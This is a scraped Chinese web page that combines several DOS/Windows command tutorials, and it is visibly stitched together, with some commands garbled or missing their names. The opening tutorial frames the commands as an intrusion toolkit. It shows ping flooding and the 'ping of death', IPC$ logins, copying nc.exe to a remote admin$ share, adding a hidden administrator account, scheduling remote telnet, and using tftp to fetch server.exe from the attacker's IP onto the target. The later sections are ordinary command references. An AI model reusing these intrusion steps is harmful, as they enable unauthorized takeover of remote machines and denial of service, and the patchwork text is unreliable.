一，ping它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，在此，我們只掌握一些基本的很有用的參數就可以了（下同）。-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如「ping IP -t -n 3」，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。下面我們舉個例子來說明一下具體用法，
這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說「初步判斷」是因為這個值是可以修改的。這里TTL=32表示操作系統可能是win98。
（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）
至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。二，nbtstat該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。
-n 列出本地機器的NETBIOS信息。當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。
三，netstat
這是一個用來查看網路狀態的命令，操作簡便功能強大。-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息。這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。
-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。四，tracert
跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。五，net這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車。在這里，我們重點掌握幾個入侵常用的子命令。
net view使用此命令查看遠程主機的所以共享資源。命令格式為net view \\IP。net use
把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: \\IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use \\IP\IPC$ "password" /user:"name"）。建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe \\192.168.0.7\admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。net start
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個命令來啟動吧。用法：net start servername，成功啟動了telnet服務。net stop
入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦？利用這個命令停掉就ok了，用法和net start同。net user
查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。
1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。
2，net user abcd /del，將用戶名為abcd的用戶刪除。
3，net user abcd /active:no，將用戶名為abcd的用戶禁用。
4，net user abcd /active:yes，激活用戶名為abcd的用戶。
5，net user abcd，查看用戶名為abcd的用戶的情況。
net localgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add，現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。net time
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（後面會講到）可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time \\IP。六，at這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間（比如2分鍾後）執行某個程序和命令。用法：at time command \\computer。表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。七，ftp大家對這個命令應該比較熟悉了吧？網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放ftp服務的主機（一般都是開了21埠的機器），如果你還不會使用ftp的命令怎麼辦？下面就給出基本的ftp命令使用方法。
首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入「help」來查看幫助（任何DOS命令都可以使用此方法查看其幫助）。大家可能看到了，這么多命令該怎麼用？其實也用不到那麼多，掌握幾個基本的就夠了。
首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入「open 主機IP ftp埠」回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。接下來就要介紹具體命令的使用方法了。
dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。
cd 進入某個文件夾。
get 下載文件到本地機器。
put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼利用就不多說了，大家就自由發揮去吧。
delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。
bye 退出當前連接。
quit 同上。
八，telnet
功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。
到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。
另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。
最後，由衷的說一句，培養良好的安全意識才是最重要的。

DOS講解雖然現在大家用的都是Windows 9x或是Windows 2000/XP，而且我們在這里學習的主要內容也是DOS所不擅長的網路！但即使是在Windows風行的現在我們也離不開DOS。如果你能熟練使用DOS，那它可以給你帶來極大的方便！而且在我們的Windows出現問題的時候大多也都是用DOS來修復的，所以學習一些DOS知識是必要的。
在這里我給大家講的是一些用來安裝和修復系統的命令，並不涉及網路方面！
基礎
DOS是英語中Disk Operation System(磁碟操作系統)的縮寫，其實DOS的版本有很多，比如MS-DOS、PC-DOS、FreeDOS等等，現在我們最常用的是MS-DOS（MS是Microsoft的縮寫），在1995年前，當Windows 95還沒有出現的年代裡，那是DOS的天下。MS-DOS的最終獨立版本是MS-DOS 6.22，再後來的DOS 7.0及其它後續版本都是在Windows里帶的，不是單獨發行版本。
在DOS環境下，我們面對的不是桌面和圖標，而是這樣的電腦屏幕：這個C:\>叫做提示符，這個閃動的橫線叫做游標。這時候DOS已經准備好，我們現在所需要做的，就是輸入一個命令讓DOS去執行。
在DOS中，每條命令輸入完成後要都要以回車做為確認或者說是終結，例：在DOS里，盤符用英文字母加上冒號來表示（如：A:、C:、D:），Windows中的「文件夾」被稱為「目錄」，用「\」來分隔不同層的目錄，最上層的單獨一個「\」（如：C:\或只一個\）叫「根目錄」，我們可以輸入dir（顯示目錄內容，以後將講到它的具體使用方法）命令來查看當前目錄中的子目錄及文件，例：如圖所示，後面帶有<DIR>的是目錄，沒有的則是文件。在DOS中，文件名的規則是8.3形式，即一個文件名由文件基本名和文件擴展名組成，中間用點「.」隔開，文件基本名由不超過8個英文字母或數字組成，文件擴展名由不超過三個英文字母或數字組成，文件基本名必須有，擴展名可以沒有。看上圖，第一列的就是「文件基本名」，第二列的是「文件擴展名」。注意：在用dir命令顯示文件列表時，文件基本名和擴展名之間並無「.」分隔符，但你在輸入完整的文件名時必須輸入它。
第三列顯示的是文件的大小，表示它佔用了多少存儲空間，也就是文件包含信息的多少，包含的信息越多，文件就越大；
第四列表示的是文件建立的日期或者是最後被改動的日期，每個文件都有對應的生成時間，就象每個人都有自己的生日一樣，文件的生成時間就是文件形成的時候。時間採用通常的表示方法，由年、月、日組成。
最後一列表示文件生成的具體時間，最後的一個字母a表示上午，p表示下午。
我們再來看看倒數一二行，這些是什麼意思呢。「 10 file(s) 」是要告訴你這個目錄內有「 10 」個文件，這些文件加起來一共有「 64，692 bytes」大，在這種計算中，每個子目錄也算是一個文件，但它的大小算零。最後一行的是告訴你當前你的工作磁碟上還剩下「 215，735，513 bytes」大小可用的磁碟空間。
用dir命令來查看磁碟上文件時，你會發現文件後綴（即文件擴展名）有很多種，它們當中大部分都是有一定含義的。其中凡後綴為exe、com或bat的文件都是可以直接執行的。這些以exe為後綴的文件叫可執行文件；以com為後綴的文件叫命令文件；以bat為後綴的文件叫批處理文件。如果我們要執行這些文件，只需在提示符下敲入文件基本名然後回車即可，不需輸入文件後綴。
基本命令
DOS的命令使用方法，大多都是這種格式：
命令名參數1 [參數2] [參數3|參數4] [參數5:選項] [參數6:]
說明：以上命令中「命令名」是必要的，加方括弧的參數是可選的，加豎線的兩個命令只能選其一，加大括弧的是必選項。
如上命令解釋是這樣的：命令名是必須要有的；「參數1」是必須的；「參數2」是可選的；「參數3」和「參數4」兩個參數只能選用其中一個，不能兩個同時用；「參數5」使用時要加選項，用「：」分隔；「參數6」使用時要加選項，但「選項1」和「選項2」要且僅能選用其中一個，不能兩個都用，但也不能兩個都不用。
這也是DOS命令書寫的規范吧！所有的DOS命令使用方法都是這樣寫的，大家也可以自己看看，一般的命令都可以用「/?」參數或不加參數來查看幫助，在這里我們只講這些命令的基本使用方法。
有些命令在使用時，可以使用「通配符」。通配符有兩個，「*」和「?」，其中「*」代表任意個任何字元，「?」只代表一個任意字元。
在有些命令中，驅動器和路徑是可選項，如果不指明驅去器名，默認為當前驅去器，如果不指明目錄則默認為當前目錄。dir
使用方法：
DIR [盤符:][路徑][文件名] [/P] [/W] [/A]/P 每滿一頁時暫停
/W 使用橫向顯示方式
/A 顯示所以文件
/B 只顯示文件名功能：顯示一類或所以文件列表，支持通配符。
例：
cd
使用方法：
cd [目錄名[\目錄名][\目錄名]...]
功能：顯示或改變當前目錄
例：md
使用方法：
md [盤符:][路徑]目錄名
功能：建立一個新目錄
例：del
使用方法：
del [盤符:][路徑]文件名
功能：刪除一個或多個文件，可以使用通配符。
例：
刪除一個文件：
按此在新窗口瀏覽圖片
刪除擴展名為sys的文件：
按此在新窗口瀏覽圖片
刪除所有文件：deltree
使用方法：
deltree [盤符:][路徑]目錄名
功能：刪除一個目錄，刪除目錄同時將刪除目錄中的所有文件
例：ren
使用方法：
ren [盤符:][路徑]原文件名修改後文件名
功能：修改文件名
例：
type
使用方法：
type [盤符:][路徑]文件名
功能：顯示文件內容，只能顯示文本文件
例：
使用方法：
[盤符:][路徑]源文件名 [盤符:][路徑][目標文件名]
功能：復制一個或一類文件，如果不指明目標文件名，則默認為目標文件名與源文件名相同

Ⅵ dos命令大全

dos常用命令：

cd 改變當前目錄；

cls 清屏；

拷貝文件；

del 刪除文件；

deltree 刪除目錄樹；

dir 列文件名；

disk 復制磁碟；

edit 文本編輯；

format 格式化磁碟；

md 建立子目錄；

mem 查看內存狀況；

more 分屏顯示；

move 移動文件、改目錄名；

rd 刪除目錄；

ren 改變文件名；

type 顯示文件內容；

sys 製作DOS系統盤；

x 拷貝目錄與文件；

attrib 設置文件屬性；

chkdsk 檢查磁碟；

date 顯示及修改日期；

defrag 磁碟碎片整理；

doskey 重新調用DOS命令；

emm386 擴展內存管理；

fdisk 硬碟分區；

help 幫助；

label 設置卷標號；

lh 將程序裝入高端內存；

memmaker內存優化管理；

msd 系統檢測；

path 設置搜尋目錄；

prempt 設置提示符；

restore 恢復備份文件；

time 顯示及修改時間；

scandisk檢測、修理磁碟；

set 設置環境變數；

smartdrv設置磁碟加速器；

undelete恢復被刪的文件；

append 設置非執行文件路徑；

debug 隨機調試程序；

diskcomp磁碟比較；

expand 還原DOS文件；

fasthelp快速顯示幫助信息；

fc 文件比較；

interink啟動伺服器；

intersvr啟動客戶機；

qbasic Basic集成環境；

setver 設置版本；

share 文件共享；

subst 路徑替換；

tree 列目錄樹；

unformat恢復已格式化的磁碟；

vsafe 防病毒；

ver 顯示DOS版本號；

vol 顯示磁碟卷標號；

ctty 改變控制設備；

(6)dos命令大全telnet擴展閱讀：

不常用命令：

append 設置非執行文件路徑；

debug 隨機調試程序；

diskcomp磁碟比較；

expand 還原DOS文件；

fasthelp 快速顯示幫助信息；

fc 文件比較；

interink 啟動伺服器；

intersvr 啟動客戶機；

qbasic Basic集成環境；

setver 設置版本；

share 文件共享；

subst 路徑替換；

tree 列目錄樹；

unformat 恢復已格式化的磁碟；

vsafe 防病毒；

ver 顯示DOS版本號；

vol 顯示磁碟卷標號；

ctty 改變控制設備；

DOS常用命令詳解；

dir 列文件名 deltree 刪除目錄樹 cls 清屏 cd 改變當前目錄；

拷貝文件 disk 復制磁碟 del 刪除文件 format 格式化磁碟；

edit 文本編輯 mem 查看內存狀況 md 建立子目錄 move 移動文件、改目錄名；

more 分屏顯示 type 顯示文件內容 rd 刪除目錄；

sys 製作DOS系統盤；

ren 改變文件名 x 拷貝目錄與文件 chkdsk 檢查磁碟 attrib 設置文件屬性；

fdisk 硬碟分區 date 顯示及修改日期 label 設置卷標號 defrag 磁碟碎片整理；

msd 系統檢測 path 設置搜尋目錄 share 文件共享 memmaker內存優化管理；

help 幫助 restore 恢復備份文件 set 設置環境變數 time 顯示及修改時間；

tree 列目錄樹 debug 隨機調試程序 doskey 重新調用DOS命令 prempt 設置提示符 undelete恢復被刪的文件 scandisk檢測、修理磁碟；

diskcomp磁碟比較 append 設置非執行文件路徑；

expand 還原DOS文件 fasthelp快速顯示幫助信息；

fc 文件比較 interink啟動伺服器；

setver 設置版本 intersvr啟動客戶機；

subst 路徑替換 qbasic Basic集成環境；

vsafe 防病毒 unformat恢復已格式化的磁碟；

ver 顯示DOS版本號 smartdrv設置磁碟加速器；

vol 顯示磁碟卷標號 lh 將程序裝入高端內存；

ctty 改變控制設備 emm386 擴展內存管理；

Ⅶ 高手啊~~~高手~~ 如何使用dos命令開啟telnet

這不是幾句話能說清楚的,
就算是進入別人的系統,還有一大串進行控制操作的命令,
而且不同命令需要別人開有不同的埠才行。
不過，我可以告訴你方法，好用請給我加分：
在默認條件下
Windows
XP是將Telnet服務關閉的，而且是禁用的。如果想用
dos命令將其啟動，單單靠一句
net
start
telnet
是不行的，因為，在禁用的條件下，是不提供啟動參數的。所以就要將啟動類型由禁用改為自動，或者是手動，才可以用
net
start
telnet命令將其啟動。那麼怎麼才能將其啟動類型更改呢！
一
使用工具包
pstools
管理工具包里的
psservice.exe
下載地址為：http://www.sysinternals.com/files/Pstools.zip
下載後將psservice.exe從工具包里解壓來後放到":\windows\system32\"目錄下，將命令提示符定位到該目錄下，輸入：
psservice.exe
setconfig
telnet
auto
即可將telnet服務的啟動類型改為自動了，每次系統啟動是telnet服務也就啟動了。如果想現在就啟動，那麼就輸入
net
start
telnet
即可啟動該服務。如：
Start
type
of
telnet
on
\\LX-005
set
to
auto.
C:\Documents
and
Settings\lenovo>net
start
telnet
Telnet
服務正在啟動
.
Telnet
服務已經啟動成功。
C:\Documents
and
Settings\lenovo>

Ⅷ DOS基礎操作命令

windows系統中dos的基本操作簡介 windows系統是現在人們使用最多的操作系統，在系統使用過程的時候有的時候需要使用到dos命令，掌握了DOS命令，將會玩轉windows系統環境！下面我為大家整理了DOS基礎操作命令大全，希望能幫到大家！

at 查看所有的計劃任務

at ip time 程序名（或一個命令） /r 在某時間運行對方某程序並重新啟動計算機attrib 文件名（目錄名）查看某文件（目錄）的屬性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉（添加）某文件的存檔，只讀，系統，隱藏屬性；用+則是添加為某屬性cacls 文件名參數顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名：設定拒絕某用戶訪問；/P 用戶名：perm 替換指定用戶的訪問許可權；/G 用戶名：perm 賦予指定用戶訪問許可權；Perm 可以是： N 無，R 讀取， W 寫入， C 更改（寫入），F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。

cacls 文件名查看文件的訪問用戶許可權列表

call 路徑批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call /?）chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?

color 顏色值設置cmd控制台前景和背景顏色；0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件 c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件 ipadmin$svv.exe c: 或：ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：

x 要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間del -F 文件名加-F參數後就可刪除只讀文件，/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間doskey 要鎖定的命令=字元

doskey 要解鎖命令= 為DOS提供的鎖定命令（編輯命令行，重新調用win2k命令，並創建宏）。如：鎖定dir命令：doskey dir=entsky （不能用doskey dir=dir）；解鎖：doskey dir=echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置echo 信息在屏幕上顯示出信息

echo 信息 >> pass.txt 將」信息」保存到pass.txt文件中exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exefc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，」> 「和」> >」是重定向命令find 文件名查找某文件

findstr 「Hello」 aa.txt 在aa.txt文件中尋找字元串hellofinger username @host 查看最近有哪些用戶登陸for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）format 盤符 /FS:類型格式化磁碟，類型：FAT、FAT32、NTFS ,例：Format D: /FS:NTFSftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送（文本文件時）goto 標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）if 在批處理程序中執行條件處理（更多說明見if命令及變數）ipconfig （winipcfg）用於windows NT及XP（windows 95 98）查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息kill -F 進程名加-F參數後強制結束某進程（為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內）md 目錄名創建目錄

mem 查看cpu使用情況

more 文件名逐屏顯示輸出文件

move 盤符路徑要移動的文件名存放移動文件的路徑移動後文件名移動文件，用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋net use ipipc$ 」」 /user:」」建立IPC空鏈接net use ipipc$ 「密碼」 /user:」用戶名」建立IPC非空鏈接net use h: ipc$ 「密碼」 /user:」用戶名」直接登陸後映射對方C：到本地為H:

net use h: ipc$ 登陸後映射對方C：到本地為H:

net use ipipc$ /del 刪除IPC鏈接

net use h: /del 刪除映射對方到本地的為H:的映射net user 用戶名密碼 /add 建立用戶

net user guest /active:yes 激活guest用戶

net user 查看有哪些用戶

net user 帳戶名查看帳戶的屬性

net locaLGroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權，注意：administrator後加s用復數net start 查看開啟了哪些服務

net start 服務名開啟服務；（如：net start telnet， net start schele）net stop 服務名停止某服務

net time 目標ip 查看對方時間

net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步，加上參數/yes可取消確認信息net view 查看本地區域網內開啟了哪些共享

net view ip 查看對方區域網內開啟了哪些共享net config 顯示系統網路設置

net logoff 斷開連接的共享

net pause 服務名暫停某服務

net send ip 「文本信息」向對方發信息net ver 區域網內正在使用的網路連接類型和信息net share 查看本地開啟的共享

net share ipc$ 開啟ipc$共享

net share ipc$ /del 刪除ipc$共享

net share c$ /del 刪除C：共享

net user guest 12345 用guest用戶登陸後用將密碼改為12345net password 密碼更改系統登陸密碼

netstat -a 查看開啟了哪些埠，常用netstat -annetstat -n 查看埠的網路連接情況，常用netstat -annetstat -v 查看正在進行的工作

netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）netstat -s 查看正在使用的所有協議使用情況nBTstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫netsh 查看或更改本地網路配置情況

open ip 連接到IP（屬telnet登陸後的命令）

pause 暫停批處理程序，並顯示出：請按任意鍵繼續….

path 路徑可執行文件的文件名為可執行文件設置一個路徑。

ping ip（或域名）向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。

ping -t -l 65550 ip 死亡之ping（發送大於64K的文件並一直ping就成了死亡之ping）prompt 名稱更改cmd.exe的顯示的命令提示符（把C:、D:統一改為：EntSky ）regedit /s 注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；regedit /e 注冊表文件名導出注冊表

REM 文本內容在批處理文件中添加註解

ren 原文件名新文件名重命名文件名

replace 源文件要替換文件的目錄替換文件route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interfaceset 指定環境變數名稱=要指派給變數的字元設置環境變數set 顯示當前所有的環境變數

set p（或其它字元）顯示出當前以字元p（或其它字元）開頭的所有環境變數start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令shutdown相關命令：

-s：表示關閉本地計算機

-a：表示取消關機操作

-f：強行關閉應用程序

-m：計算機名：控制遠程計算機

-i：顯示圖形用戶界面，但必須是shutdown的第一個選項-l：注銷當前用戶

-r：關機並重啟

-t：時間：設置關機倒計時

-c：「消息內容」：輸入關機對話框中的'消息taskmgr 調出任務管理器

telnet 在本機上直接鍵入telnet 將進入本機的telnettelnet ip 埠遠和登陸伺服器，默認埠為23title 標題名字更改CMD窗口標題名字

tftp -i 自己IP（用目標機器作跳板時這用目標機器IP） get server.exe c:server.exe 登陸後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機tlist -t 以樹行列表顯示進程（為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內）tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠trAcert -參數 ip（或計算機名）跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。

tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱type 文件名顯示文本文件的內容

ver 在DOS窗口下顯示版本信息

winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）IIS服務命令：

iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）iisreset /start或stop 啟動（停止）所有Internet服務iisreset /restart 停止然後重新啟動所有Internet服務iisreset /status 顯示所有Internet服務狀態iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。

FTP常用命令：

ftp的命令行格式為：

ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。

-d 使用調試方式。

-n 限制ftp的自動登錄，即不使用。netrc文件。

-g 取消全局文件名。

help [命令] 或 ?[命令] 查看命令說明

bye 或 quit 終止主機FTP進程，並退出FTP管理方式。

pwd 列出當前遠端主機目錄

put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中mget [remote-files] 從遠端主機接收一批文件至本地主機mput local-files 將本地主機中一批文件傳送至遠端主機dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件。如果有本地文件，就將結果寫至本地文件ascii 設定以ASCII方式傳送文件（預設值）

bin 或 image 設定以二進制方式傳送文件

bell 每完成一次文件傳送，報警提示

cp 返回上一級目錄

close 中斷與遠程伺服器的ftp會話（與open對應）open host[port] 建立指定ftp伺服器連接，可指定連接埠刪除遠端主機中的文件

m [remote-files] 刪除一批文件

mkdir directory-name 在遠端主機中建立目錄rename [from] [to] 改變遠端主機中的文件名rmdir directory-name 刪除遠端主機中的目錄status 顯示當前FTP的狀態

system 顯示遠端主機系統類型

user user-name [password] [account] 重新以別的用戶名登錄遠端主機open host [port] 重新建立一個新的連接

prompt 交互提示模式

macdef 定義宏命令

lcd 改變當前本地主機的工作目錄，如果預設，就轉到當前用戶的HOME目錄chmod 改變遠端主機的文件許可權

case 當為ON時，用MGET命令拷貝的文件名到本地機器中，全部轉換為小寫字母cd remote-dir 進入遠程主機目錄

! 在本地機中執行交互shell，exit回到ftp環境，如！ls*.zipMYSQL 命令：

mysql -h主機地址 -u用戶名 -p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。

（例：mysql -h110.110.110.110 -Uroot -P123456註：u與root可以不用加空格，其它也一樣）

exit 退出MYSQL

mysqladmin -u用戶名 -p舊密碼 password 新密碼修改密碼grant select on 資料庫。* to 用戶名@登錄主機 identified by 「密碼」; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。

use mysql;

show tables; 顯示庫中的數據表

describe 表名；顯示數據表的結構

